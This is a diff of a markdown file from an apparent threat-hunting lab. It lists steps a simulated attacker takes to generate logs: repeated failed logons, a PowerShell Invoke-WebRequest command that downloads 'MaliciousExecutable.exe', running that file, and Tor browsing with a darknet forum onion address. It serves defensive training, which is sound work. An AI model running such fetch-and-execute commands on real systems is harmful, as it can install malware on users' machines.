AaronRMartinez/Threat-Hunting-Scenario-Compromise/Threat-Hunting-Scenario-System-Compromise-Creation.md

 ## Steps the Threat Actor Took to Create Logs and IoCs:
 1. Several failed user logons in quick succession.
-2. Opened a PowerShell terminal and executed the command `Invoke-WebRequest -Uri \"https://github.com/AaronRMartinez/Threat-Hunting-Scenario-Compromise/raw/refs/heads/main/MaliciousExecutable.exe\" -OutFile \"$env:USERPROFILE\\Downloads\\MaliciousExecutable.exe\"` to initiate the `MaliciousExecutable.exe` donwload.
+2. Opened a PowerShell terminal and executed the command `Invoke-WebRequest -Uri \"https://github.com/AaronRMartinez/Threat-Hunting-Scenario-Compromise/raw/refs/heads/main/MaliciousExecutable.exe\" -OutFile \"$env:USERPROFILE\\Downloads\\MaliciousExecutable.exe\"` to initiate the `MaliciousExecutable.exe` download.
-3. Opens the TOR browser from the folder on the desktop
+3. Once `MaliciousExecutable.exe` was downloaded, the threat actor simply double-clicked the executable to run it.
 4. Connect to TOR and browse a few sites.
 For example:
    - **WARNING: The links to onion sites change a lot and these have changed.
 However if you connect to Tor and browse around normal sites a bit, the necessary logs should still be created:**
    - Current Dread Forum: ```dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion```